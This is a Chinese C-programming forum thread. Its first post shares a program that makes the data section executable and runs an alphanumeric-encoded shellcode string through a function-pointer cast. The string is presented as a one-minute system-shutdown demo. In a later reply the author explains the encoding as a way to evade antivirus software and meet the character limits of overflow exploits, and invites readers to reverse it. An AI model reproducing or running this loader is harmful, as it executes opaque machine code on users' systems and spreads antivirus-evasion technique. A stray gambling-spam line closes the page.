VC驿站

 找回密码
 加入驿站

QQ登录

只需一步,快速开始

搜索
查看: 389|回复: 9
打印 上一主题 下一主题

[分享] 一个神奇的C语言代码,很另类的代码

[复制链接]
18_avatar_middle
跳转到指定楼层
1#
在线会员 发表于 2019-9-25 13:20:03 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
  1. #pragma GCC optimize 0
  2. #pragma comment(linker,"/section:.data,rwe")
  3. char str[]= "PYVTX10X41PZ41H4A4I1TA71TADVTZ32PZNBFZDQC02DQD0D13DJE5I16OK4C162K5D16695J1TMN3P1"
  4.             "W0P5J0D7N7Z9L9K2I1W5B1M439LLM060L0R691Z414K2Z0M8O5H3Y8M3V604N13KK3L6O0R5JKO0A9Y5"
  5.             "B7O6P0N9S3Y0B1H5K100N2Z9R3A0F61075H114S1A9PMK4L5D6P1DML0L7M0F325G0H00MLKN0P7ZMN3"
  6.             "H8M0N0G0T060G2OMNJM1I3Z0K1M065A0Q3T2Z7N5KML2E0P3P3B2D8L02OK1W2C0I0U0S0O8L667M0QK"
  7.             "K660Y2H1C1U1S3X9W2B043J67JL9Q2IKL2CMN0J5O4S8K18620S0Y64MO2C0S2D1B050Y021W8M0A1S2"
  8.             "L5G1T640Q7K5DON3H4H3X355BMMKKMM0L2IKO09KN1W7M2G607K0S1W602M2A2A2M1S0R2Z0W047N2E0"
  9.             "T097O0A0D050U1U161F02";
  10. int main()
  11. {
  12.     return ((int(*)(void))&str)();
  13. }
复制代码


这是一个另类的延时关机代码。
在1分钟内可用 shutdown -a取消关机。

评分

参与人数 1驿站币 +2 热心值 +2 收起 理由
58_avatar_small 敏敏 + 2 + 2 运行后会关机,这种例子很多,但不明觉厉。

查看全部评分





上一篇:USC2转ANSI怎么转
下一篇:优化cout和换行(新手)
84_avatar_middle
2#
在线会员 发表于 2019-9-25 21:45:23 | 只看该作者
看不懂,这么麻烦也不知道有什么用
58_avatar_middle
3#
online_vip 发表于 2019-9-25 22:53:27 | 只看该作者
magshines 发表于 2019-9-25 21:45
看不懂,这么麻烦也不知道有什么用

运行后就shutdown倒计时,一分钟关机,以前见过很多类似的,没研究过。
84_avatar_middle
4#
在线会员 发表于 2019-9-25 22:58:58 | 只看该作者
敏敏 发表于 2019-9-25 22:53
运行后就shutdown倒计时,一分钟关机,以前见过很多类似的,没研究过。

感觉像是机器或者汇编语言,只是感觉这个没多大意义,还不如直接输入shutdown来的省事
58_avatar_middle
5#
online_vip 发表于 2019-9-25 23:13:59 | 只看该作者
magshines 发表于 2019-9-25 22:58
感觉像是机器或者汇编语言,只是感觉这个没多大意义,还不如直接输入shutdown来的省事

主要可以用于免杀技术。
84_avatar_middle
6#
在线会员 发表于 2019-9-26 07:32:54 | 只看该作者
敏敏 发表于 2019-9-25 23:13
主要可以用于免杀技术。

用c的话,可以创建个bat文件运行shutdown,然后再删除bat就行了
18_avatar_middle
7#
ico_lz  楼主| 发表于 2019-9-26 12:43:19 | 只看该作者
呵呵。。这段代码可不是单纯的为了关机的。毕竟关机方法太多了。
这段代码的精华就在于那个字符串,其实是一段加密过的机器码,也就是大家平时在入侵种常用的shellcode。
这里只是一个构造的关机演示代码。虽然是演示代码,但是C代码,所以就发C版块了。
至于为什么shellcode写成这样,是因为在不同的软件漏洞环境中,对于shellcode中的字符要求是不一样的。
比如文件路径超长引起的溢出,在构造shellcode时就得考虑shellcode中的字符是否符合文件路径中允许的那些字符。
主要是让shellcode过杀软或者规避特殊字符以达到漏洞需求的。看雪上面有很多其他类似的其他加密方法。目的都是一样的,但还是加密后的
shellcode越短越好,毕竟溢出空间有限。有兴趣的可以逆向下那个字符串。

评分

参与人数 1驿站币 +2 热心值 +2 收起 理由
58_avatar_small 敏敏 + 2 + 2 很给力!

查看全部评分

58_avatar_middle
8#
online_vip 发表于 2019-9-27 12:45:20 | 只看该作者
wqte45 发表于 2019-9-26 12:43
呵呵。。这段代码可不是单纯的为了关机的。毕竟关机方法太多了。
这段代码的精华就在于那个字符串,其实是 ...

能先讲解一下,这里面指针的使用吗?
58_avatar_middle
9#
online_vip 发表于 2019-9-27 12:46:25 | 只看该作者
wqte45 发表于 2019-9-26 12:43
呵呵。。这段代码可不是单纯的为了关机的。毕竟关机方法太多了。
这段代码的精华就在于那个字符串,其实是 ...

虽然C和指针一书,建过类似这种很复杂的指针,但看这指针操作还是晕,我试着用优先级推,推不出来。
50_avatar_middle
10#
在线会员 发表于 2019-9-30 11:18:58 | 只看该作者
#pragma comment(linker,"/section:.data,rwe")
您需要登录后才可以回帖 登录 | 加入驿站 qq_login

本版积分规则

关闭

站长提醒上一条 /2 下一条

QQ|小黑屋|手机版|VC驿站 ( 辽ICP备09019393号tongdun|网站地图wx_jqr

GMT+8, 2019-10-10 07:08

Powered by Discuz! X3.4

© 2009-2019 cctry.com

快速回复 返回顶部 返回列表
时时彩平台排名